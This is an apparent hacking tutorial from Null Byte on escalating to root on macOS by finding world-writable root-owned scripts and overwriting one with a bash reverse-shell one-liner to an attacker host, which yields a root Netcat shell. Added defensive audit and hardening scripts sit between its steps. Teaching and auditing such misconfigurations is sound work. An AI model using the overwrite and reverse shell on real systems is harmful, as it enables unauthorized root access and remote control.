
How to Perform Privilege Escalation, Part 1 (Abuse of File Permissions) by «Null Byte :: WonderHowTo



Most macOS hacks use a non-root terminal to create a backdoor on the device. As a low-privileged user, a lot of damage can be done, but that access has its limits. Think twice before making a file writable and executable by everyone: an attacker can turn your innocent scripts into permanent root backdoors.

As a low-privilege user, we can perform a variety of attacks, including z and live streaming of the target's desktop in real time. But dumping user login hashes, exfiltrating keychain data, modifying system files, and running many Empire modules all require root privileges.

The method in this article requires no input from the target macOS user, which works well if you are trying to stay undetected. However, it may take a bit of luck to succeed, because misconfigured files may simply not be present on the target MacBook or other Mac. The idea is simple: the attacker scans the Mac for files with overly permissive attributes and rewrites the contents of one of those files so that it executes malicious code as the root user.

In the second method (shown in the next guide), the attacker must invoke a convincing pop-up window that prompts the user for their password. The following is an example of an attacker-controlled iTunes-style prompt.

Readers interested in the prompting method can jump to my next guide. However, that technique should be a last resort, because it requires input from the target user and may arouse suspicion in them or trigger their antivirus software. For this reason, I will first show how to find files with dangerous permissions.

By default, macOS ships no root-owned files that normal users can modify, which is why a little luck is needed. But as the target user installs software and manages data over time, it is possible that some files were intentionally created or modified with insecure permissions. For example, an application developer or user might create an executable that is owned by root but allows a lower-privileged user to modify and execute its contents. This is common with installation and support scripts designed to install additional software or automate repetitive tasks.

Before proceeding, readers unfamiliar with Unix operating systems should become familiar with file permissions and UIDs. Being able to identify vulnerable files depends heavily on understanding how file ownership, group membership, and permission bits work.

Option 1. Find files with dangerous permissions (fast and dirty)

To find files with insecure permissions, we quickly examine every file on the target device for specific attributes. Let's take a look at the command, and I'll break down each argument one by one.

  find / -uid 0 -type f -perm -333 2>/dev/null -exec ls -l {} \;

  • With / as the starting point, find considers every single file on the device. To narrow the search (which is not recommended), this path could instead be something like /etc/ or /Users/.
  • The -uid 0 argument restricts the results to files owned by UID 0, the root user. This does not necessarily mean only files created by "root": it is not unusual for an ordinary user account to have been created as, or elevated to, UID 0 at some point, which gives that account full root access indefinitely.
  • The -type f argument instructs find to report only regular files (f), omitting directories.
  • The -perm argument may be the most important part of the entire command. -perm -333 tells find to show only files whose write and execute bits are set for the owner, the group, and everyone else.
  • 2>/dev/null discards error messages. Without it, find reports hundreds of "permission denied" errors as it walks root-owned files and directories. It is not essential to the command, but it keeps the output clean and free of noise.
  • Finally, -exec ls -l {} \; runs ls with the -l option on each file find discovers, listing that file's attributes. Below is an example of the output.

  -rwxrwxrwx 1 root wheel 882K Jul 14 23:57 /Users/tokyoneon/Downloads/setup.py
  -rwxrwxrwx 1 Permanent staff 610K Aug 1 22:27 /Users/tokyoneon/Desktop/test.sh
  -rwxrwxrwx 1 root wheel 4M Jul 19 23:03 /opt/installer.sh
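For defenders who want to run the same audit on their own machines, here is an added example (not code from the original article) that wraps the find logic above in two reusable functions. It goes slightly beyond the article's single command: besides the -perm -333 check (writable and executable by everyone), it also reports files that are merely world-writable (-perm -002), since a root-owned configuration or script fragment that a root process reads is dangerous even without an execute bit. The fixture directory, file names and the optional UID parameter are assumptions made for this example.

```shell
#!/bin/sh
# Added example, not part of the original article.
# Audit helpers that list files owned by a given UID (root by default) which
# other users can tamper with. Run as: sh audit.sh --run [search_root]

audit_writable_exec() {
    # Files that everyone can write AND execute: the article's exact condition.
    # -perm -333 means the w and x bits are set for user, group and other.
    root="${1:-/}"
    uid="${2:-0}"
    find "$root" -uid "$uid" -type f -perm -333 2>/dev/null
}

audit_world_writable() {
    # Broader check: any regular file that 'other' can write to, executable or not.
    # -perm -002 means the 'other' write bit is set (octal 002).
    root="${1:-/}"
    uid="${2:-0}"
    find "$root" -uid "$uid" -type f -perm -002 2>/dev/null
}

count_lines() {
    # Portable line count (macOS wc pads with spaces).
    wc -l | tr -d ' '
}

make_fixture() {
    # Constructed test directory so the checks can be exercised offline:
    #   bad.sh  -> 777: writable and executable by everyone (flagged by both checks)
    #   conf    -> 666: world-writable but not executable (flagged only by the broad check)
    #   ok.sh   -> 755: executable but not writable by others (never flagged)
    dir="$(mktemp -d)"
    printf '#!/bin/sh\necho hi\n' > "$dir/bad.sh"; chmod 777 "$dir/bad.sh"
    printf 'setting=1\n'          > "$dir/conf";   chmod 666 "$dir/conf"
    printf '#!/bin/sh\n'          > "$dir/ok.sh";  chmod 755 "$dir/ok.sh"
    echo "$dir"
}

# Only scan the real filesystem when explicitly asked to.
if [ "${1:-}" = "--run" ]; then
    echo "== writable + executable by everyone (owner uid 0) =="
    audit_writable_exec "${2:-/}"
    echo "== world-writable (owner uid 0) =="
    audit_world_writable "${2:-/}"
fi
```

Running it against a fixture created by make_fixture with the current user's UID shows the difference between the two checks: bad.sh appears in both lists, conf only in the second, and ok.sh in neither. On a real system the interesting hits are the ones under /opt, /usr/local, /Library and user home directories, exactly the kind of installer and helper scripts the article describes.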

Every user, regardless of UID, can read, write, and execute these root-owned files (rwxrwxrwx). To turn one of them into a root backdoor from a low-privileged shell, we now only need to replace the file's contents (using echo).

  echo 'bash -i >& /dev/tcp/1.2.3.4/9999 0>&1' > /opt/installer.sh

This Bash command opens a reverse TCP shell connection to the attacker's machine (1.2.3.4) on port 9999. By overwriting (>) the contents of the installer.sh script with this command, the script executes the Bash command with root privileges the next time it runs. I am using a short Bash one-liner here because it is shorter than the Tclsh command and better demonstrates how to insert code from a terminal into a script, but it can easily be swapped for a different one-liner that creates a new root backdoor.

To execute the hijacked installer script, use the following command with a trailing & so that it runs as a background process.

  /opt/installer.sh &

Back on the attacker's machine, a new root Netcat shell has been established.

Option 2. Use Unix Privesc Check (Slow and Comprehensive)

Unix Privesc Check (UPC) is one of several open-source projects developed for enumerating permissions. UPC can search for read, write, and execute permissions on sensitive files, list users without a password, and much more, as we'll see shortly.

To use UPC from a low-privileged shell, we first change (cd) to the /tmp directory and download the UPC ZIP with curl.

  cd /tmp/
  curl -L https://github.com/inquisb/unix-privesc-check/archive/master.zip -o master.zip

The -L argument tells curl to follow download redirects, while the -o argument tells curl to save the ZIP to a local file. Both arguments are required.

When the download finishes, unzip the contents of master.zip.

  unzip master.zip

  Archive:  master.zip
  29db4cfff5ae6b4bee10e1c4279e58ccbf03ad16
     creating: unix-privesc-check-master/
    inflating: unix-privesc-check-master/README.md
     creating: unix-privesc-check-master/checks/
    inflating: unix-privesc-check-master/checks/credentials
    inflating: unix-privesc-check-master/checks/devices_options
    inflating: unix-privesc-check-master/checks/devices_permission
     creating: unix-privesc-check-master/checks/enabled/
     creating: unix-privesc-check-master/checks/enabled/all/
      linking: unix-privesc-check-master/checks/enabled/all/credentials -> ../../credentials
      linking: unix-privesc-check-master/checks/enabled/all/devices_options -> ../../devices_options
      linking: unix-privesc-check-master/checks/enabled/all/devices_permission -> ../../devices_permission
      linking: unix-privesc-check-master/checks/enabled/all/gpg_agent -> ../../gpg_agent
      linking: unix-privesc-check-master/checks/enabled/all/group_writable -> ../../group_writable
      linking: unix-privesc-check-master/checks/enabled/all/history_readable -> ../../history_readable
      linking: unix-privesc-check-master/checks/enabled/all/homedirs_executable -> ../../homedirs_executable
      linking: unix-privesc-check-master/checks/enabled/all/homedirs_writable -> ../../homedirs_writable
      linking: unix-privesc-check-master/checks/enabled/all/jar -> ../../jar
      linking: unix-privesc-check-master/checks/enabled/all/key_material -> ../../key_material
      linking: unix-privesc-check-master/checks/enabled/all/ldap_authentication -> ../../ldap_authentication
      linking: unix-privesc-check-master/checks/enabled/all/nis_authentication -> ../../nis_authentication
      linking: unix-privesc-check-master/checks/enabled/all/passwd_hashes -> ../../passwd_hashes

  ......

  unix-privesc-check-master/checks/enabled/attack_surface/world_writable -> ../../world_writable
  unix-privesc-check-master/checks/enabled/sdl/privileged_banned -> ../../privileged_banned
  unix-privesc-check-master/checks/enabled/sdl/privileged_change_privileges -> ../../privileged_change_privileges
  unix-privesc-check-master/checks/enabled/sdl/privileged_chroot -> ../../privileged_chroot
  unix-privesc-check-master/checks/enabled/sdl/privileged_dependency -> ../../privileged_dependency
  unix-privesc-check-master/checks/enabled/sdl/privileged_nx -> ../../privileged_nx
  unix-privesc-check-master/checks/enabled/sdl/privileged_path -> ../../privileged_path
  unix-privesc-check-master/checks/enabled/sdl/privileged_pie -> ../../privileged_pie
  unix-privesc-check-master/checks/enabled/sdl/privileged_random -> ../../privileged_random
  unix-privesc-check-master/checks/enabled/sdl/privileged_relro -> ../../privileged_relro
  unix-privesc-check-master/checks/enabled/sdl/privileged_rpath -> ../../privileged_rpath
  unix-privesc-check-master/checks/enabled/sdl/privileged_ssp -> ../../privileged_ssp
  unix-privesc-check-master/checks/enabled/sdl/privileged_tmp -> ../../privileged_tmp
  unix-privesc-check-master/checks/enabled/sdl/privileged_writable -> ../../privileged_writable

Change into the newly created unix-privesc-check-master/ directory.

  cd unix-privesc-check-master/

Use the --help argument to display the arguments and options UPC supports.

  ./upc.sh --help

  unix-privesc-check v2.1-dev (https://github.com/inquisb/unix-privesc-check)

  Shell script to check for privilege escalation vectors on UNIX systems.

  Usage: ./upc.sh

    --help        display this help and exit
    --version     display version and exit
    --color       enable color output
    --verbose     verbosity level (0-2, default: 1)
    -             select one of the following check types:
                      all
                      attack_surface
                      sdl
    --checks      provide a comma-separated list of the checks to perform, chosen from the following checks:
                      credentials
                      devices_options
                      devices_permission
                      gpg_agent
                      group_writable
                      history_readable
                      homedirs_executable
                      homedirs_writable
                      jar
                      key_material
                      ldap_authentication
                      nis_authentication
                      passwd_hashes
                      postgresql_configuration
                      postgresql_connection
                      postgresql_trust
                      privileged_arguments
                      privileged_banned
                      privileged_change_privileges
                      privileged_chroot
                      privileged_dependency
                      privileged_environment_variables
                      privileged_nx
                      privileged_path
                      privileged_pie
                      privileged_random
                      privileged_relro
                      privileged_rpath
                      privileged_ssp
                      privileged_tmp
                      privileged_writable
                      setgid
                      setuid
                      shadow_hashes
                      ssh_agent
                      ssh_key
                      sudo
                      system_aslr
                      system_configuration
                      system_libraries
                      system_map
                      system_nx
                      system_selinux
                      world_writable

As we can see, nearly 50 modules (or "checks") are available for finding misconfigured and overly permissive files. The following is a sample command that uses the world_writable and privileged_writable checks to find files whose contents any user can change.

This process may take several hours, depending on the size of the target's hard disk(s). It will probably also heat up the MacBook's CPU, making the built-in fans very loud. Unfortunately, UPC has no option to throttle or limit the workload, so if you want to avoid detection, this script may not be ideal.

  ./upc.sh --color --checks world_writable,privileged_writable

  unix-privesc-check v2.1-dev (https://github.com/inquisb/unix-privesc-check)

  2 I: [file] Cache generated ...
  3 I: [world_writable] Starting at:
  4 W: [world_writable] /Library/Caches belongs to the user root (group admin) and is world-writable with sticky bit (drwxrwxrwt)
  5 W: [world_writable] /private/var/run/mDNSResponder belongs to the user root (group daemon) and is world-writable (srw-rw-rw-)
  6 W: [world_writable] /private/var/run/syslog belongs to the user root (group daemon) and is world-writable (srw-rw-rw-)
  7 W: [world_writable] /private/var/run/cupsd belongs to the user root (group daemon) and is world-writable (srwxrwxrwx)
  8 W: [world_writable] /private/tmp belongs to the user root (group wheel) and is world-writable with sticky bit (drwxrwxrwt)
  9 W: [world_writable] /private/tmp/com.apple.launchd.aJbbEm79Lm/Render belongs to the user tokyoneon (group wheel) and is world-writable (srw-rw-rw-)
  10 W: [world_writable] /private/tmp/com.apple.launchd.XlO6hrECUn/Listeners belongs to the user tokyoneon (group wheel) and is world-writable (srw-rw-rw-)
  11 W: [world_writable] /private/tmp/agvtool belongs to the user tokyoneon (group wheel) and is world-writable with sticky bit (-rwxrwxrwt)
  12 W: [world_writable] /Users/Shared belongs to the user root (group wheel) and is world-writable with sticky bit (drwxrwxrwt)
  13 W: [world_writable] /Users/Shared/adi belongs to the user root (group wheel) and is world-writable (drwxrwxrwx)
  14 W: [world_writable] /Users/tokyoneon/Downloads/setup.py belongs to the user root (group staff) and is world-writable (-rwxrwxrwx)
  15 W: [world_writable] /Users/tokyoneon/Desktop/test.sh belongs to the user tokyoneon (group staff) and is world-writable (-rwx-wx-wx)
  16 W: [world_writable] /Users/tokyoneon/Library/Containers/com.apple.geod/Data/Library/Caches/com.apple.geod belongs to the user tokyoneon (group staff) and is world-writable (drwxrwxrwx)
  17 W: [world_writable] /Users/tokyoneon/Library/Containers/com.apple.geod/Data/Library/Caches/com.apple.geod/MapTiles belongs to the user tokyoneon (group staff) and is world-writable (drwxrwxrwx)
  18 W: [world_writable] /Users/tokyoneon/Library/Containers/com.apple.geod/Data/Library/Caches/com.apple.geod/MapTiles/MapTiles.sqlitedb

  19 .......

  20 W: [world_writable] /dev/ptywc belongs to the user root (group wheel) and is world-writable (crw-rw-rw-)
  21 W: [world_writable] /dev/ttywd belongs to the user root (group wheel) and is world-writable (crw-rw-rw-)
  22 W: [world_writable] /dev/ptywd belongs to the user root (group wheel) and is world-writable (crw-rw-rw-)
  23 W: [world_writable] /dev/ttywe belongs to the user root (group wheel) and is world-writable (crw-rw-rw-)
  24 W: [world_writable] /dev/ptywe belongs to the user root (group wheel) and is world-writable (crw-rw-rw-)
  25 W: [world_writable] /dev/ttywf belongs to the user root (group wheel) and is world-writable (crw-rw-rw-)
  26 W: [world_writable] /dev/ptywf belongs to the user root (group wheel) and is world-writable (crw-rw-rw-)
  27 W: [world_writable] /dev/ptmx belongs to the user root (group tty) and is world-writable (crw-rw-rw-)
  28 W: [world_writable] /dev/random belongs to the user root (group wheel) and is world-writable (crw-rw-rw-)
  29 W: [world_writable] /dev/urandom belongs to the user root (group wheel) and is world-writable (crw-rw-rw-)
  30 W: [world_writable] /dev/dtrace belongs to the user root (group wheel) and is world-writable (crw-rw-rw-)
  31 W: [world_writable] /dev/dtracehelper belongs to the user root (group wheel) and is world-writable (crw-rw-rw-)
  32 W: [world_writable] /dev/lockstat belongs to the user root (group wheel) and is world-writable (crw-rw-rw-)
  33 W: [world_writable] /dev/sdt belongs to the user root (group wheel) and is world-writable (crw-rw-rw-)
  34 W: [world_writable] /dev/systrace belongs to the user root (group wheel) and is world-writable (crw-rw-rw-)
  35 W: [world_writable] /dev/machtrace belongs to the user root (group wheel) and is world-writable (crw-rw-rw-)
  36 W: [world_writable] /dev/fbt belongs to the user root (group wheel) and is world-writable (crw-rw-rw-)
  37 W: [world_writable] /dev/profile belongs to the user root (group wheel) and is world-writable (crw-rw-rw-)
  38 W: [world_writable] /dev/io8log belongs to the user root (group wheel) and is world-writable (crw-rw-rw-)
  39 W: [world_writable] /dev/io8logtemp belongs to the user root (group wheel) and is world-writable (crw-rw-rw-)
  40 W: [world_writable] /dev/cu.Bluetooth-Incoming-Port belongs to the user root (group wheel) and is world-writable (crw-rw-rw-)
  41 W: [world_writable] /dev/tty.Bluetooth-Incoming-Port belongs to the user root (group wheel) and is world-writable (crw-rw-rw-)
  42 W: [world_writable] /dev/autofs_nowait belongs to the user root (group wheel) and is world-writable (crw-rw-rw-)
  43 W: [world_writable] /dev/autofs_notrigger belongs to the user root (group wheel) and is world-writable (crw-rw-rw-)
  44 W: [world_writable] /dev/autofs_homedirmounter belongs to the user root (group wheel) and is world-writable (crw-rw-rw-)

The UPC output above is heavily trimmed, but pay close attention to the file attributes (-rwxrwxrwx) on lines 14 and 15. Any regular file reported with "rwx" permissions for everyone deserves further investigation, because it may allow an attacker to escalate the privileges of their shell.
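Most of UPC's world_writable warnings are noise for this purpose (device nodes, sockets, sticky-bit directories), so a defender triaging a long run wants to pull out just the regular files that others can write and execute. The following filter is an added example, not code from the article or from the UPC project; it parses warning lines in the format shown above. The sample lines embedded in it are constructed to match that format, with two of them copied from lines 14 and 15 of the output.

```shell
#!/bin/sh
# Added example, not part of the original article or of unix-privesc-check.
# Filters UPC world_writable output down to regular files that 'other' can
# both write and execute. Usage: ./upc.sh --checks world_writable | flag_rwx_files

# Constructed sample of UPC output (same format as the article's listing).
UPC_SAMPLE='2 I: [file] Cache generated ...
8 W: [world_writable] /private/tmp belongs to the user root (group wheel) and is world-writable with sticky bit (drwxrwxrwt)
14 W: [world_writable] /Users/tokyoneon/Downloads/setup.py belongs to the user root (group staff) and is world-writable (-rwxrwxrwx)
15 W: [world_writable] /Users/tokyoneon/Desktop/test.sh belongs to the user tokyoneon (group staff) and is world-writable (-rwx-wx-wx)
28 W: [world_writable] /dev/random belongs to the user root (group wheel) and is world-writable (crw-rw-rw-)'

flag_rwx_files() {
    # Reads UPC output on stdin, prints "<mode> <owner> <path>" for each
    # warning about a regular file whose 'other' bits include w and x.
    awk '
        $2 == "W:" && $3 == "[world_writable]" {
            path = $4
            owner = ""
            # owner follows the literal word "user" in the message
            for (i = 5; i <= NF; i++) if ($i == "user") owner = $(i + 1)
            # the mode string is the last field, wrapped in parentheses
            mode = $NF
            gsub(/[()]/, "", mode)
            # mode layout: [type][user rwx][group rwx][other rwx]
            # char 1 = file type, char 9 = other-write, char 10 = other-execute
            if (substr(mode, 1, 1) == "-" &&
                substr(mode, 9, 1) == "w" &&
                substr(mode, 10, 1) == "x")
                print mode, owner, path
        }'
}

flag_root_rwx_files() {
    # Same filter, restricted to files owned by root: the set an attacker
    # would need for the overwrite described in the article.
    flag_rwx_files | awk '$2 == "root"'
}

# Demo against the constructed sample when run directly with --demo.
if [ "${1:-}" = "--demo" ]; then
    printf '%s\n' "$UPC_SAMPLE" | flag_rwx_files
fi
```

Against the sample, the filter keeps setup.py and test.sh and drops the sticky-bit directory and the device node; flag_root_rwx_files narrows that further to setup.py, the only root-owned hit. Piping a full UPC run through it turns hours of output into a short list worth fixing.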

UPC is an excellent and extremely thorough enumeration script. Many of its features go beyond the scope of this article, but I encourage readers to experiment with UPC themselves and find out which modules (checks) best fit their needs.

Conclusion

Users are often too quick to chmod 777 a file, giving a seemingly harmless script ultimate power over their system. It may seem silly or overly simplistic, but files with such permissive attributes are quite common and easily abused by an attacker on your system.

If you're curious about potentially exploitable files on your own macOS device, use the find and UPC commands presented in this article. If permissive files are found, you should immediately delete them or apply a more restrictive set of permissions to minimize the attack surface.
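To make that remediation step concrete, here is an added example (not code from the original article) of a small helper that takes paths from the find or UPC output and tightens them. The default action removes only the group and other write bits, the minimal change that closes the overwrite described above; the strict mode also removes all access for others, which is appropriate for installer scripts that only root should run. The helper records the mode before and after, refuses to touch anything that is not a regular file, and supports a dry run. The mode_of helper and the temp-file fixture are assumptions of this example.

```shell
#!/bin/sh
# Added example, not part of the original article.
# Remediation helper for files flagged as writable by everyone.
# Usage: find / -uid 0 -type f -perm -333 2>/dev/null | harden_list [strict] [dry]

mode_of() {
    # Portable 10-character mode string such as -rwxrwxrwx (macOS and Linux ls).
    ls -ld "$1" | cut -c1-10
}

harden_file() {
    # $1 = path, $2 = "strict" to also drop all 'other' access, $3 = "dry" for no change.
    f="$1"
    level="${2:-minimal}"
    dry="${3:-}"
    if [ ! -f "$f" ]; then
        echo "skip (not a regular file): $f" >&2
        return 1
    fi
    before="$(mode_of "$f")"
    if [ "$level" = "strict" ]; then
        # Only the owner keeps write access; 'other' loses everything.
        change="g-w,o-rwx"
    else
        # Minimal fix: nobody but the owner may modify the file.
        change="go-w"
    fi
    if [ -n "$dry" ]; then
        echo "would chmod $change $f ($before)"
        return 0
    fi
    chmod "$change" "$f"
    after="$(mode_of "$f")"
    echo "$f $before -> $after"
}

harden_list() {
    # Reads one path per line on stdin and hardens each; keeps going on skips.
    level="${1:-minimal}"
    dry="${2:-}"
    while IFS= read -r path; do
        harden_file "$path" "$level" "$dry" || true
    done
}

make_fixture_file() {
    # Constructed 777 file to demonstrate the before/after change offline.
    f="$(mktemp)"
    printf '#!/bin/sh\necho installer\n' > "$f"
    chmod 777 "$f"
    echo "$f"
}
```

On a world-writable installer such as the article's /opt/installer.sh, the minimal mode turns -rwxrwxrwx into -rwxr-xr-x, and strict mode into -rwxr-x---. Run with the dry flag first and review the list; a file that genuinely needs to be writable by a non-root user should be owned by that user rather than left root-owned and world-writable.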

Next Up: How to Perform Privilege Escalation by Password Phishing in macOS

Cover image of Eugene / PEXELS; Screenshot of tokyoneon / Null Byte
